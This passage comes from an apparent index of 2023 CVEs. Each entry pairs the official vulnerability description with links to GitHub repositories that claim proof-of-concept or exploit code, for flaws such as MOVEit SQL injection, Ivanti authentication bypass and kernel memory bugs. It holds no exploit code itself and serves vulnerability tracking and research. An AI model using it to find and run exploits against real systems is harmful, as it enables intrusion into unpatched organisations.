etc. Earlier versions of Kiwi TCMS had introduced upload validators in order to prevent potentially dangerous files from being uploaded and Content-Security-Policy definition to prevent cross-site-scripting attacks. The upload validation checks were not 100% robust which left the possibility to circumvent them and upload a potentially dangerous file which allows execution of arbitrary JavaScript in the browser. Additionally we've discovered that Nginx's `proxy_pass` directive will strip some headers negating protections built into Kiwi TCMS when served behind a reverse proxy. This issue has been addressed in version 12.4. Users are advised to upgrade. Users unable to upgrade who are serving Kiwi TCMS behind a reverse proxy should make sure that additional header values are still passed to the client browser. If they aren't redefining them inside the proxy configuration. + + +- [mnqazi/CVE-2023-33977](https://github.com/mnqazi/CVE-2023-33977) + +### CVE-2023-34034 (2023-07-19) + +Using "**" as a pattern in Spring Security configuration \nfor WebFlux creates a mismatch in pattern matching between Spring \nSecurity and Spring WebFlux, and the potential for a security bypass.\n\n + + +- [hotblac/cve-2023-34034](https://github.com/hotblac/cve-2023-34034) + +### CVE-2023-34035 (2023-07-18) + +Spring Security versions 5.8 prior to 5.8.5, 6.0 prior to 6.0.5, and 6.1 prior to 6.1.2 could be susceptible to authorization rule misconfiguration if the application uses requestMatchers(String) and multiple servlets, one of them being Spring MVC’s DispatcherServlet. (DispatcherServlet is a Spring MVC component that maps HTTP endpoints to methods on @Controller-annotated classes.)\n\nSpecifically, an application is vulnerable when all of the following are true:\n\n * Spring MVC is on the classpath\n * Spring Security is securing more than one servlet in a single application (one of them being Spring MVC’s DispatcherServlet)\n * The application uses requestMatchers(String) to refer to endpoints that are not Spring MVC endpoints\n\n\nAn application is not vulnerable if any of the following is true:\n\n * The application does not have Spring MVC on the classpath\n * The application secures no servlets other than Spring MVC’s DispatcherServlet\n * The application uses requestMatchers(String) only for Spring MVC endpoints\n\n\n\n + + +- [mouadk/CVE-2023-34035-Poc](https://github.com/mouadk/CVE-2023-34035-Poc) +- [jzheaux/cve-2023-34035-mitigations](https://github.com/jzheaux/cve-2023-34035-mitigations) + +### CVE-2023-34039 (2023-08-29) + +Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation. A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI. + + +- [sinsinology/CVE-2023-34039](https://github.com/sinsinology/CVE-2023-34039) +- [CharonDefalt/CVE-2023-34039](https://github.com/CharonDefalt/CVE-2023-34039) +- [Cyb3rEnthusiast/CVE-2023-34039](https://github.com/Cyb3rEnthusiast/CVE-2023-34039) +- [syedhafiz1234/CVE-2023-34039](https://github.com/syedhafiz1234/CVE-2023-34039) +- [adminxb/CVE-2023-34039](https://github.com/adminxb/CVE-2023-34039) + +### CVE-2023-34040 (2023-08-24) + +In Spring for Apache Kafka 3.0.9 and earlier and versions 2.9.10 and earlier, a possible deserialization attack vector existed, but only if unusual configuration was applied. An attacker would have to construct a malicious serialized object in one of the deserialization exception record headers.\n\nSpecifically, an application is vulnerable when all of the following are true:\n\n * The user does not configure an ErrorHandlingDeserializer for the key and/or value of the record\n * The user explicitly sets container properties checkDeserExWhenKeyNull and/or checkDeserExWhenValueNull container properties to true.\n * The user allows untrusted sources to publish to a Kafka topic\n\n\nBy default, these properties are false, and the container only attempts to deserialize the headers if an ErrorHandlingDeserializer is configured. The ErrorHandlingDeserializer prevents the vulnerability by removing any such malicious headers before processing the record.\n\n\n + + +- [Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040](https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040) +- [pyn3rd/CVE-2023-34040](https://github.com/pyn3rd/CVE-2023-34040) +- [buiduchoang24/CVE-2023-34040](https://github.com/buiduchoang24/CVE-2023-34040) +- [huyennhat-dev/cve-2023-34040](https://github.com/huyennhat-dev/cve-2023-34040) + +### CVE-2023-34050 (2023-10-19) + +\n\n\n\n\n\n\n\n\n\nIn spring AMQP versions 1.0.0 to\n2.4.16 and 3.0.0 to 3.0.9 , allowed list patterns for deserializable class\nnames were added to Spring AMQP, allowing users to lock down deserialization of\ndata in messages from untrusted sources; however by default, when no allowed\nlist was provided, all classes could be deserialized.\n\n\n\nSpecifically, an application is\nvulnerable if\n\n\n\n\n * the\n SimpleMessageConverter or SerializerMessageConverter is used\n\n * the user\n does not configure allowed list patterns\n\n * untrusted\n message originators gain permissions to write messages to the RabbitMQ\n broker to send malicious content\n\n\n\n\n\n\n\n\n\n + + +- [X1r0z/spring-amqp-deserialization](https://github.com/X1r0z/spring-amqp-deserialization) + +### CVE-2023-34051 (2023-10-20) + +VMware Aria Operations for Logs contains an authentication bypass vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.\n + + +- [horizon3ai/CVE-2023-34051](https://github.com/horizon3ai/CVE-2023-34051) + +### CVE-2023-34092 (2023-06-01) + +Vite provides frontend tooling. Prior to versions 2.9.16, 3.2.7, 4.0.5, 4.1.5, 4.2.3, and 4.3.9, Vite Server Options (`server.fs.deny`) can be bypassed using double forward-slash (//) allows any unauthenticated user to read file from the Vite root-path of the application including the default `fs.deny` settings (`['.env', '.env.*', '*.{crt,pem}']`). Only users explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected, and only files in the immediate Vite project root folder could be exposed. This issue is fixed in vite@4.3.9, vite@4.2.3, vite@4.1.5, vite@4.0.5, vite@3.2.7, and vite@2.9.16. + + +- [FlapyPan/test-cve-2023-34092](https://github.com/FlapyPan/test-cve-2023-34092) + +### CVE-2023-34096 (2023-06-08) + +Thruk is a multibackend monitoring webinterface which currently supports Naemon, Icinga, Shinken and Nagios as backends. In versions 3.06 and prior, the file `panorama.pm` is vulnerable to a Path Traversal vulnerability which allows an attacker to upload a file to any folder which has write permissions on the affected system. The parameter location is not filtered, validated or sanitized and it accepts any kind of characters. For a path traversal attack, the only characters required were the dot (`.`) and the slash (`/`). A fix is available in version 3.06.2. + + +- [galoget/Thruk-CVE-2023-34096](https://github.com/galoget/Thruk-CVE-2023-34096) + +### CVE-2023-34152 (2023-05-30) + +A vulnerability was found in ImageMagick. This security flaw cause a remote code execution vulnerability in OpenBlob with --enable-pipes configured. + + +- [overgrowncarrot1/ImageTragick_CVE-2023-34152](https://github.com/overgrowncarrot1/ImageTragick_CVE-2023-34152) +- [SudoIndividual/CVE-2023-34152](https://github.com/SudoIndividual/CVE-2023-34152) + +### CVE-2023-34194 (2023-12-13) + +StringEqual in TiXmlDeclaration::Parse in tinyxmlparser.cpp in TinyXML through 2.6.2 has a reachable assertion (and application exit) via a crafted XML document with a '\0' located after whitespace. + + +- [vm2mv/tinyxml](https://github.com/vm2mv/tinyxml) + +### CVE-2023-34212 (2023-06-12) + +The JndiJmsConnectionFactoryProvider Controller Service, along with the ConsumeJMS and PublishJMS Processors, in Apache NiFi 1.8.0 through 1.21.0 allow an authenticated and authorized user to configure URL and library properties that enable deserialization of untrusted data from a remote location.\n\nThe resolution validates the JNDI URL and restricts locations to a set of allowed schemes.\n\nYou are recommended to upgrade to version 1.22.0 or later which fixes this issue.\n\n\n + + +- [mbadanoiu/CVE-2023-34212](https://github.com/mbadanoiu/CVE-2023-34212) + +### CVE-2023-34312 (2023-06-01) + +In Tencent QQ through 9.7.8.29039 and TIM through 3.4.7.22084, QQProtect.exe and QQProtectEngine.dll do not validate pointers from inter-process communication, which leads to a write-what-where condition. + + +- [vi3t1/qq-tim-elevation](https://github.com/vi3t1/qq-tim-elevation) +- [lan1oc/CVE-2023-34312-exp](https://github.com/lan1oc/CVE-2023-34312-exp) + +### CVE-2023-34362 (2023-06-02) + +In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions. + + +- [deepinstinct/MOVEit_CVE-2023-34362_IOCs](https://github.com/deepinstinct/MOVEit_CVE-2023-34362_IOCs) +- [horizon3ai/CVE-2023-34362](https://github.com/horizon3ai/CVE-2023-34362) +- [sfewer-r7/CVE-2023-34362](https://github.com/sfewer-r7/CVE-2023-34362) +- [kenbuckler/MOVEit-CVE-2023-34362](https://github.com/kenbuckler/MOVEit-CVE-2023-34362) +- [Malwareman007/CVE-2023-34362](https://github.com/Malwareman007/CVE-2023-34362) +- [toorandom/moveit-payload-decrypt-CVE-2023-34362](https://github.com/toorandom/moveit-payload-decrypt-CVE-2023-34362) +- [errorfiathck/MOVEit-Exploit](https://github.com/errorfiathck/MOVEit-Exploit) +- [Chinyemba-ck/MOVEit-CVE-2023-34362](https://github.com/Chinyemba-ck/MOVEit-CVE-2023-34362) +- [glen-pearson/MoveIT-CVE-2023-34362-RCE](https://github.com/glen-pearson/MoveIT-CVE-2023-34362-RCE) +- [aditibv/MOVEit-CVE-2023-34362](https://github.com/aditibv/MOVEit-CVE-2023-34362) + +### CVE-2023-34458 (2023-07-13) + +mx-chain-go is the official implementation of the MultiversX blockchain protocol, written in golang. When executing a relayed transaction, if the inner transaction failed, it would have increased the inner transaction's sender account nonce. This could have contributed to a limited DoS attack on a targeted account. The fix is a breaking change so a new flag `RelayedNonceFixEnableEpoch` was needed. This was a strict processing issue while validating blocks on a chain. This vulnerability has been patched in version 1.4.17. + + +- [miguelc49/CVE-2023-34458-2](https://github.com/miguelc49/CVE-2023-34458-2) +- [miguelc49/CVE-2023-34458-1](https://github.com/miguelc49/CVE-2023-34458-1) +- [miguelc49/CVE-2023-34458-3](https://github.com/miguelc49/CVE-2023-34458-3) + +### CVE-2023-34468 (2023-06-12) + +The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution.\n\nThe resolution validates the Database URL and rejects H2 JDBC locations.\n\nYou are recommended to upgrade to version 1.22.0 or later which fixes this issue.\n\n\n + + +- [mbadanoiu/CVE-2023-34468](https://github.com/mbadanoiu/CVE-2023-34468) + +### CVE-2023-34537 (2023-06-13) + +A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data. + + +- [leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5](https://github.com/leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5) + +### CVE-2023-34584 +- [fu2x2000/-CVE-2023-34584](https://github.com/fu2x2000/-CVE-2023-34584) + +### CVE-2023-34598 (2023-06-29) + +Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) where it's possible to include the content of several files present in the installation folder in the server's response. + + +- [maddsec/CVE-2023-34598](https://github.com/maddsec/CVE-2023-34598) +- [Lserein/CVE-2023-34598](https://github.com/Lserein/CVE-2023-34598) + +### CVE-2023-34599 (2023-06-29) + +Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code. + + +- [maddsec/CVE-2023-34599](https://github.com/maddsec/CVE-2023-34599) + +### CVE-2023-34600 (2023-06-20) + +Adiscon LogAnalyzer v4.1.13 and before is vulnerable to SQL Injection. + + +- [costacoco/Adiscon](https://github.com/costacoco/Adiscon) + +### CVE-2023-34634 (2023-08-01) + +Greenshot 1.2.10 and below allows arbitrary code execution because .NET content is insecurely deserialized when a .greenshot file is opened. + + +- [radman404/CVE-2023-34634](https://github.com/radman404/CVE-2023-34634) + +### CVE-2023-34830 (2023-06-27) + +i-doit Open v24 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the timeout parameter on the login page. + + +- [leekenghwa/CVE-2023-34830---Reflected-XSS-found-in-I-doit-Open-v24-and-below](https://github.com/leekenghwa/CVE-2023-34830---Reflected-XSS-found-in-I-doit-Open-v24-and-below) + +### CVE-2023-34835 (2023-06-27) + +A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary JavaScript code via a vulnerable delete_file parameter. + + +- [sahiloj/CVE-2023-34835](https://github.com/sahiloj/CVE-2023-34835) + +### CVE-2023-34836 (2023-06-27) + +A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a crafted script to the Dtltyp and ListName parameters. + + +- [sahiloj/CVE-2023-34836](https://github.com/sahiloj/CVE-2023-34836) + +### CVE-2023-34837 (2023-06-27) + +A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a vulnerable parameter GrpPath. + + +- [sahiloj/CVE-2023-34837](https://github.com/sahiloj/CVE-2023-34837) + +### CVE-2023-34838 (2023-06-27) + +A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a crafted script to the Description parameter. + + +- [sahiloj/CVE-2023-34838](https://github.com/sahiloj/CVE-2023-34838) + +### CVE-2023-34839 (2023-06-27) + +A Cross Site Request Forgery (CSRF) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows a remote attacker to gain privileges via a Custom CSRF exploit to create new user function in the application. + + +- [sahiloj/CVE-2023-34839](https://github.com/sahiloj/CVE-2023-34839) + +### CVE-2023-34840 (2023-06-30) + +angular-ui-notification v0.1.0, v0.2.0, and v0.3.6 was discovered to contain a cross-site scripting (XSS) vulnerability. + + +- [Xh4H/CVE-2023-34840](https://github.com/Xh4H/CVE-2023-34840) + +### CVE-2023-34843 (2023-06-28) + +Traggo Server 0.3.0 is vulnerable to directory traversal via a crafted GET request. + + +- [rootd4ddy/CVE-2023-34843](https://github.com/rootd4ddy/CVE-2023-34843) + +### CVE-2023-34845 (2023-06-16) + +Bludit v3.14.1 was discovered to contain an arbitrary file upload vulnerability in the component /admin/new-content. This vulnerability allows attackers to execute arbitrary web scripts or HTML via uploading a crafted SVG file. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration). + + +- [r4vanan/CVE-2023-34845](https://github.com/r4vanan/CVE-2023-34845) + +### CVE-2023-34852 (2023-06-15) + +PublicCMS <=V4.0.202302 is vulnerable to Insecure Permissions. + + +- [funny-kill/CVE-2023-34852](https://github.com/funny-kill/CVE-2023-34852) + +### CVE-2023-34853 (2023-08-22) + +Buffer Overflow vulnerability in Supermicro motherboard X12DPG-QR 1.4b allows local attackers to hijack control flow via manipulation of SmcSecurityEraseSetupVar variable. + + +- [risuxx/CVE-2023-34853](https://github.com/risuxx/CVE-2023-34853) + +### CVE-2023-34924 (2023-06-26) + +H3C Magic B1STW B1STV100R012 was discovered to contain a stack overflow via the function SetAPInfoById. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. + + +- [ChrisL0tus/CVE-2023-34924](https://github.com/ChrisL0tus/CVE-2023-34924) + +### CVE-2023-34960 (2023-08-01) + +A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. + + +- [Aituglo/CVE-2023-34960](https://github.com/Aituglo/CVE-2023-34960) +- [Jenderal92/CHAMILO-CVE-2023-34960](https://github.com/Jenderal92/CHAMILO-CVE-2023-34960) +- [YongYe-Security/CVE-2023-34960](https://github.com/YongYe-Security/CVE-2023-34960) +- [ThatNotEasy/CVE-2023-34960](https://github.com/ThatNotEasy/CVE-2023-34960) +- [Mantodkaz/CVE-2023-34960](https://github.com/Mantodkaz/CVE-2023-34960) +- [tucommenceapousser/CVE-2023-34960-ex](https://github.com/tucommenceapousser/CVE-2023-34960-ex) +- [dvtarsoul/ChExp](https://github.com/dvtarsoul/ChExp) + +### CVE-2023-34965 (2023-06-13) + +SSPanel-Uim 2023.3 does not restrict access to the /link/ interface which can lead to a leak of user information. + + +- [AgentY0/CVE-2023-34965](https://github.com/AgentY0/CVE-2023-34965) + +### CVE-2023-34992 (2023-10-10) + +A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.0.0 and 6.7.0 through 6.7.5 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.1 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via crafted API requests. + + +- [horizon3ai/CVE-2023-34992](https://github.com/horizon3ai/CVE-2023-34992) +- [d0rb/CVE-2023-34992-Checker](https://github.com/d0rb/CVE-2023-34992-Checker) + +### CVE-2023-35001 (2023-07-05) + +Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace + + +- [synacktiv/CVE-2023-35001](https://github.com/synacktiv/CVE-2023-35001) +- [syedhafiz1234/nftables-oob-read-write-exploit-CVE-2023-35001-](https://github.com/syedhafiz1234/nftables-oob-read-write-exploit-CVE-2023-35001-) +- [mrbrelax/Exploit_CVE-2023-35001](https://github.com/mrbrelax/Exploit_CVE-2023-35001) + +### CVE-2023-35078 (2023-07-25) + +An authentication bypass vulnerability in Ivanti EPMM allows unauthorized users to access restricted functionality or resources of the application without proper authentication. + + +- [vchan-in/CVE-2023-35078-Exploit-POC](https://github.com/vchan-in/CVE-2023-35078-Exploit-POC) +- [lager1/CVE-2023-35078](https://github.com/lager1/CVE-2023-35078) +- [raytheon0x21/CVE-2023-35078](https://github.com/raytheon0x21/CVE-2023-35078) +- [synfinner/CVE-2023-35078](https://github.com/synfinner/CVE-2023-35078) +- [emanueldosreis/nmap-CVE-2023-35078-Exploit](https://github.com/emanueldosreis/nmap-CVE-2023-35078-Exploit) +- [Blue-number/CVE-2023-35078](https://github.com/Blue-number/CVE-2023-35078) +- [0nsec/CVE-2023-35078](https://github.com/0nsec/CVE-2023-35078) + +### CVE-2023-35080 (2023-11-14) + +A vulnerability has been identified in the Ivanti Secure Access Windows client, which could allow a locally authenticated attacker to exploit a vulnerable configuration, potentially leading to various security risks, including the escalation of privileges, denial of service, or information disclosure. + + +- [HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation](https://github.com/HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation) + +### CVE-2023-35082 (2023-08-15) + +An authentication bypass vulnerability in Ivanti EPMM 11.10 and older, allows unauthorized users to access restricted functionality or resources of the application without proper authentication. This vulnerability is unique to CVE-2023-35078 announced earlier. + + +- [Chocapikk/CVE-2023-35082](https://github.com/Chocapikk/CVE-2023-35082) + +### CVE-2023-35086 (2023-07-21) + +\nIt is identified a format string vulnerability in ASUS RT-AX56U V2 & RT-AC86U. This vulnerability is caused by directly using input as a format string when calling syslog in logmessage_normal function, in the do_detwan_cgi module of httpd. A remote attacker with administrator privilege can exploit this vulnerability to perform remote arbitrary code execution, arbitrary system operation or disrupt service.\n\nThis issue affects RT-AX56U V2: 3.0.0.4.386_50460; RT-AC86U: 3.0.0.4_386_51529.\n\n + + +- [tin-z/CVE-2023-35086-POC](https://github.com/tin-z/CVE-2023-35086-POC) + +### CVE-2023-35636 (2023-12-12) + +Microsoft Outlook Information Disclosure Vulnerability + + +- [duy-31/CVE-2023-35636](https://github.com/duy-31/CVE-2023-35636) + +### CVE-2023-35671 (2023-09-11) + +In onHostEmulationData of HostEmulationManager.java, there is a possible way for a general purpose NFC reader to read the full card number and expiry details when the device is in locked screen mode due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [MrTiz/CVE-2023-35671](https://github.com/MrTiz/CVE-2023-35671) + +### CVE-2023-35674 (2023-09-11) + +In onCreate of WindowState.java, there is a possible way to launch a background activity due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [Thampakon/CVE-2023-35674](https://github.com/Thampakon/CVE-2023-35674) +- [SpiralBL0CK/Guide-and-theoretical-code-for-CVE-2023-35674](https://github.com/SpiralBL0CK/Guide-and-theoretical-code-for-CVE-2023-35674) + +### CVE-2023-35687 (2023-09-11) + +In MtpPropertyValue of MtpProperty.h, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [pazhanivel07/frameworks_av_AOSP_10_r33_CVE-2023-35687_CVE-2023-35679](https://github.com/pazhanivel07/frameworks_av_AOSP_10_r33_CVE-2023-35687_CVE-2023-35679) + +### CVE-2023-35744 (2024-05-03) + +D-Link DAP-2622 DDP Configuration Restore Server IPv6 Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root.\n. Was ZDI-CAN-20071. + + +- [ADSSA-IT/CVE-2023-35744](https://github.com/ADSSA-IT/CVE-2023-35744) + +### CVE-2023-35793 (2023-09-26) + +An issue was discovered in Cassia Access Controller 2.1.1.2303271039. Establishing a web SSH session to gateways is vulnerable to Cross Site Request Forgery (CSRF) attacks. + + +- [Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH](https://github.com/Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH) + +### CVE-2023-35794 (2023-10-27) + +An issue was discovered in Cassia Access Controller 2.1.1.2303271039. The Web SSH terminal endpoint (spawned console) can be accessed without authentication. Specifically, there is no session cookie validation on the Access Controller; instead, there is only Basic Authentication to the SSH console. + + +- [Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking](https://github.com/Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking) + +### CVE-2023-35801 (2023-06-23) + +A directory traversal vulnerability in Safe Software FME Server before 2022.2.5 allows an attacker to bypass validation when editing a network-based resource connection, resulting in the unauthorized reading and writing of arbitrary files. Successful exploitation requires an attacker to have access to a user account with write privileges. FME Flow 2023.0 is also a fixed version. + + +- [trustcves/CVE-2023-35801](https://github.com/trustcves/CVE-2023-35801) + +### CVE-2023-35803 (2023-10-04) + +IQ Engine before 10.6r2 on Extreme Network AP devices has a Buffer Overflow. + + +- [lachlan2k/CVE-2023-35803](https://github.com/lachlan2k/CVE-2023-35803) + +### CVE-2023-35813 (2023-06-17) + +Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3. + + +- [aalexpereira/CVE-2023-35813](https://github.com/aalexpereira/CVE-2023-35813) +- [BagheeraAltered/CVE-2023-35813-PoC](https://github.com/BagheeraAltered/CVE-2023-35813-PoC) + +### CVE-2023-35828 (2023-06-18) + +An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in renesas_usb3_remove in drivers/usb/gadget/udc/renesas_usb3.c. + + +- [Trinadh465/linux-4.19.72_CVE-2023-35828](https://github.com/Trinadh465/linux-4.19.72_CVE-2023-35828) + +### CVE-2023-35840 (2023-06-19) + +_joinPath in elFinderVolumeLocalFileSystem.class.php in elFinder before 2.1.62 allows path traversal in the PHP LocalVolumeDriver connector. + + +- [afine-com/CVE-2023-35840](https://github.com/afine-com/CVE-2023-35840) + +### CVE-2023-35843 (2023-06-19) + +NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information. + + +- [Lserein/CVE-2023-35843](https://github.com/Lserein/CVE-2023-35843) +- [b3nguang/CVE-2023-35843](https://github.com/b3nguang/CVE-2023-35843) + +### CVE-2023-35844 (2023-06-19) + +packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow .. directory traversal and do not ensure that an intended file extension (.csv or .png) is used. + + +- [Lserein/CVE-2023-35844](https://github.com/Lserein/CVE-2023-35844) + +### CVE-2023-35854 (2023-06-20) + +Zoho ManageEngine ADSelfService Plus through 6113 has an authentication bypass that can be exploited to steal the domain controller session token for identity spoofing, thereby achieving the privileges of the domain controller administrator. NOTE: the vendor's perspective is that they have "found no evidence or detail of a security vulnerability." + + +- [bluestarry33/exp](https://github.com/bluestarry33/exp) + +### CVE-2023-35885 (2023-06-20) + +CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication. + + +- [datackmy/FallingSkies-CVE-2023-35885](https://github.com/datackmy/FallingSkies-CVE-2023-35885) +- [Chocapikk/CVE-2023-35885](https://github.com/Chocapikk/CVE-2023-35885) + +### CVE-2023-35985 (2023-11-27) + +An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to a failure to properly validate a dangerous extension. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted malicious site if the browser plugin extension is enabled. + + +- [SpiralBL0CK/-CVE-2023-35985](https://github.com/SpiralBL0CK/-CVE-2023-35985) +- [N00BIER/CVE-2023-35985](https://github.com/N00BIER/CVE-2023-35985) + +### CVE-2023-36003 (2023-12-12) + +XAML Diagnostics Elevation of Privilege Vulnerability + + +- [m417z/CVE-2023-36003-POC](https://github.com/m417z/CVE-2023-36003-POC) +- [baph0m3th/CVE-2023-36003](https://github.com/baph0m3th/CVE-2023-36003) + +### CVE-2023-36025 (2023-11-14) + +Windows SmartScreen Security Feature Bypass Vulnerability + + +- [ka7ana/CVE-2023-36025](https://github.com/ka7ana/CVE-2023-36025) +- [J466Y/test_CVE-2023-36025](https://github.com/J466Y/test_CVE-2023-36025) +- [coolman6942o/-EXPLOIT-CVE-2023-36025](https://github.com/coolman6942o/-EXPLOIT-CVE-2023-36025) + +### CVE-2023-36076 (2023-09-01) + +SQL Injection vulnerability in smanga version 3.1.9 and earlier, allows remote attackers to execute arbitrary code and gain sensitive information via mediaId, mangaId, and userId parameters in php/history/add.php. + + +- [deIndra/CVE-2023-36076](https://github.com/deIndra/CVE-2023-36076) + +### CVE-2023-36085 (2023-10-24) + +The sisqualWFM 7.1.319.103 thru 7.1.319.111 for Android, has a host header injection vulnerability in its "/sisqualIdentityServer/core/" endpoint. By modifying the HTTP Host header, an attacker can change webpage links and even redirect users to arbitrary or malicious locations. This can lead to phishing attacks, malware distribution, and unauthorized access to sensitive resources. + + +- [omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection](https://github.com/omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection) + +### CVE-2023-36109 (2023-09-20) + +Buffer Overflow vulnerability in JerryScript version 3.0, allows remote attackers to execute arbitrary code via ecma_stringbuilder_append_raw component at /jerry-core/ecma/base/ecma-helpers-string.c. + + +- [Limesss/CVE-2023-36109](https://github.com/Limesss/CVE-2023-36109) + +### CVE-2023-36123 (2023-10-06) + +Directory Traversal vulnerability in Hex-Dragon Plain Craft Launcher 2 version Alpha 1.3.9, allows local attackers to execute arbitrary code and gain sensitive information. + + +- [9Bakabaka/CVE-2023-36123](https://github.com/9Bakabaka/CVE-2023-36123) + +### CVE-2023-36143 (2023-06-30) + +Maxprint Maxlink 1200G v3.4.11E has an OS command injection vulnerability in the "Diagnostic tool" functionality of the device. + + +- [leonardobg/CVE-2023-36143](https://github.com/leonardobg/CVE-2023-36143) +- [RobinTrigon/CVE-2023-36143](https://github.com/RobinTrigon/CVE-2023-36143) + +### CVE-2023-36144 (2023-06-30) + +An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration. + + +- [leonardobg/CVE-2023-36144](https://github.com/leonardobg/CVE-2023-36144) + +### CVE-2023-36146 (2023-06-30) + +A Stored Cross-Site Scripting (XSS) vulnerability was found in Multilaser RE 170 using firmware 2.2.6733. + + +- [leonardobg/CVE-2023-36146](https://github.com/leonardobg/CVE-2023-36146) + +### CVE-2023-36158 (2023-08-03) + +Cross Site Scripting (XSS) vulnerability in sourcecodester Toll Tax Management System 1.0 allows remote attackers to run arbitrary code via the First Name and Last Name fields on the My Account page. + + +- [unknown00759/CVE-2023-36158](https://github.com/unknown00759/CVE-2023-36158) + +### CVE-2023-36159 (2023-08-03) + +Cross Site Scripting (XSS) vulnerability in sourcecodester Lost and Found Information System 1.0 allows remote attackers to run arbitrary code via the First Name, Middle Name and Last Name fields on the Create User page. + + +- [unknown00759/CVE-2023-36159](https://github.com/unknown00759/CVE-2023-36159) + +### CVE-2023-36163 (2023-07-11) + +Cross Site Scripting vulnerability in IP-DOT BuildaGate v.BuildaGate5 allows a remote attacker to execute arbitrary code via a crafted script to the mc parameter of the URL. + + +- [TraiLeR2/CVE-2023-36163](https://github.com/TraiLeR2/CVE-2023-36163) + +### CVE-2023-36164 +- [TraiLeR2/CVE-2023-36164](https://github.com/TraiLeR2/CVE-2023-36164) + +### CVE-2023-36165 +- [TraiLeR2/CVE-2023-36165](https://github.com/TraiLeR2/CVE-2023-36165) + +### CVE-2023-36168 +- [TraiLeR2/CVE-2023-36168](https://github.com/TraiLeR2/CVE-2023-36168) + +### CVE-2023-36169 +- [TraiLeR2/CVE-2023-36169](https://github.com/TraiLeR2/CVE-2023-36169) + +### CVE-2023-36250 (2023-09-14) + +CSV Injection vulnerability in GNOME time tracker version 3.0.2, allows local attackers to execute arbitrary code via crafted .tsv file when creating a new record. + + +- [BrunoTeixeira1996/CVE-2023-36250](https://github.com/BrunoTeixeira1996/CVE-2023-36250) + 